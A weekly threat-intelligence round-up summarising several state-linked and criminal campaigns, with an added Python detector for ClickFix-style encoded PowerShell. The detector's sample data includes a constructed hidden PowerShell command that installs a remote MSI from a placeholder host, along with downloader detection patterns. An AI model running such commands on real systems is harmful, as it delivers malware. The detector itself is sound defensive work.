Weekly Cyber Round-up

Intelligence Report

September 26, 2024

UNC5267 poses as IT workers to gain access to foreign organisations 

Mandiant researchers observed IT workers linked to North Korea posing as non-North Korean nationals to secure jobs at foreign organisations. The group, tracked as UNC5267, has been active since 2018 and consists of individuals sent by North Korea to China and Russia, with smaller numbers in Africa and Southeast Asia, aiming to obtain jobs with Western companies, particularly in the United States tech sector. Their objectives include financial gain through illicit salary withdrawals, maintaining long-term access to networks for future exploitation, and potential espionage or disruptive activities. UNC5267 gains initial access by using stolen identities to apply for remote work positions, often as contractors. UNC5267 resumes typically list US addresses with education credentials from universities in Singapore, Japan, or Hong Kong. 

North American transportation and logistics firms targeted in malware campaign

Since May 2024, Proofpoint researchers observed a cluster of activity targeting transportation and logistics companies in North America to deliver various malware payloads. Between May and July 2024, the attackers primarily delivered Lumma Stealer, StealC, or NetSupport. In August 2024, they shifted tactics, using new infrastructure and the ‘ClickFix’ technique to deliver malware, including DanaBot and Arechclient2. After compromising legitimate email accounts, the attackers inject malicious content into ongoing conversations to deliver the malware, including via Google Drive URLs or attachments. Campaigns using the ClickFix technique guide users through multiple steps to copy, paste, and run a Base64-encoded PowerShell script that downloads an MSI file to load DanaBot.
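The ClickFix stage described above ends with the victim pasting an encoded PowerShell one-liner that fetches an MSI. From a detection standpoint, the useful artefact is the process-creation record: the `-EncodedCommand` argument can be decoded in the pipeline and inspected for the MSI-download pattern. The following is an added example for this round-up, not code from Proofpoint or from the original report; the record field names (`host`, `parent`, `cmdline`), the indicator heuristics and the sample command lines are all constructed assumptions.

```python
"""Triage encoded PowerShell launches for the ClickFix "download an MSI" pattern.

Added example (not from the original round-up or from Proofpoint). It scans
constructed process-creation records for PowerShell invocations carrying a
Base64 -EncodedCommand payload, decodes the UTF-16LE script and flags scripts
that fetch and run an MSI, the behaviour the report attributes to the DanaBot
ClickFix lure. Field names, heuristics and sample lines are assumptions.
"""
import base64
import re
from dataclasses import dataclass

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a Base64 blob long enough to hold a script.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e[a-z]{0,14}\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed indicators for the "download an MSI and run it" stage.
INDICATORS = {
    "msiexec": re.compile(r"\bmsiexec(?:\.exe)?\b", re.I),
    "msi_file": re.compile(r"\.msi\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "downloader": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|Start-BitsTransfer|\bcurl\b", re.I),
}


def encode_for_powershell(script: str) -> str:
    """Return the -EncodedCommand form of a script (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Extract and decode an -EncodedCommand payload; None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Alert:
    host: str
    parent: str
    decoded_script: str
    indicators: list
    severity: str


def triage(record: dict):
    """Classify one process-creation record; return an Alert or None."""
    cmdline = record.get("cmdline", "")
    if "powershell" not in cmdline.lower():
        return None
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    if "msiexec" in hits or "msi_file" in hits:
        # MSI plus a remote fetch is the full ClickFix chain; MSI alone is weaker.
        severity = "high" if "url" in hits or "downloader" in hits else "medium"
    else:
        severity = "review"  # encoded but no MSI-fetch pattern; still worth a look
    return Alert(record.get("host", "?"), record.get("parent", "?"), script, hits, severity)


def scan(records):
    """Return alerts for every record that triage() considers notable."""
    return [a for a in (triage(r) for r in records) if a is not None]


# Constructed sample process-creation records (not real telemetry).
SAMPLE_RECORDS = [
    {"host": "WS-01", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "WS-02", "parent": "svchost.exe",
     "cmdline": "powershell.exe -enc " + encode_for_powershell("Get-ChildItem C:\\Logs")},
    {"host": "WS-03", "parent": "explorer.exe",  # consistent with a user pasting into the Run box
     "cmdline": "powershell.exe -w hidden -ep bypass -ec " + encode_for_powershell(
         "Start-Process msiexec.exe -ArgumentList '/i http://example.invalid/update.msi /qn'")},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_RECORDS):
        print(f"{a.severity:6} {a.host} parent={a.parent} indicators={a.indicators}")
        print("        ", a.decoded_script)
```

Decoding before matching matters: a rule that only looks at the raw command line never sees `msiexec` or the URL, because both are hidden inside the Base64 blob. The parent process is recorded as context rather than a verdict; an `explorer.exe` parent fits the "copy, paste, run" lure but is not on its own evidence of compromise.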

UNC1860 targets Middle East networks with passive implants designed for stealth

Mandiant researchers analysed the Iranian state-sponsored threat actor UNC1860, which is assessed to likely be an initial access provider that enables operations targeting government and telecommunications entities in the Middle East. UNC1860 uses specialised tooling and passive backdoors to gain persistent access to high-priority networks. UNC1860’s tooling includes the TEMPLEPLAY and VIROGREEN GUI-operated malware controllers. TEMPLEPLAY is used as a controller for the TEMPLEDOOR backdoor, whilst VIROGREEN is designed to exploit vulnerable SharePoint servers using CVE-2019-0604. UNC1860’s tradecraft and targeting overlap with Shrouded Snooper, Scarred Manticore, and Storm-0861. The researchers note that APT34 and UNC1860 have both been observed operating within the same victim environments, possibly sharing tools and access.

SloppyLemming abuses cloud service providers to target entities in Asia 

Cloudflare researchers identified the threat actor SloppyLemming abusing cloud service providers to conduct extensive operations that target government, defence, energy, telecommunications, and technology entities in Pakistan, as well as in Sri Lanka, Bangladesh, and China. The activity was first observed in late 2022 and remains ongoing. SloppyLemming uses a custom-built tool, named CloudPhish, to create a malicious Cloudflare Worker that handles credential logging logic and the exfiltration of victim credentials. The threat actor ultimately aims to gain access to targeted email accounts within organisations that provide intelligence value to them. As an initial infection vector, SloppyLemming uses spear phishing emails that have redirected victims to both credential harvesting pages and a scam website.

Phishing campaign targets ICICI Bank users with malicious app and website 

Security researcher Rakesh Krishnan discovered a phishing campaign using a malicious host mimicking ICICI Bank and a malicious app disguised as ICICI Helpdesk. The malicious domain was registered on August 22nd, 2024, hosted under Hostinger, and has been tracked to an ASN location in Cyprus. The ASN has previously been used by TA557 to host PikaBot and has also hosted malware such as GuLoader, AgentTesla, and NetSupportRAT. The malicious app has been operational since August 2024 but has not yet been found in the wild. More than 500,000 downloads were observed on the Downloads Page, though Krishnan noted this could be an inflated number to trick users into installing the app.

High Priority Vulnerabilities

Name             Software                     Base Score   Temp Score
CVE-2024-8963    CSA                          9.1          7.0
                 Related: Critical path traversal flaw patched in Ivanti CSA
CVE-2024-45229   Director                     6.6          6.3
                 Related: Versa Networks Patches Vulnerability Exposing Authentication Tokens
CVE-2024-7490    Advanced Software Framework  9.8          9.8
                 Related: Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk
CVE-2021-21972   Cloud Foundation             9.8          6.0
                 Related: Twelve hacktivist group uses LockBit in attacks targeting Russian organisations
CVE-2017-0199    Office                       7.8          6.0
                 Related: Remcos RAT campaigns target users in Bulgaria and Turkey
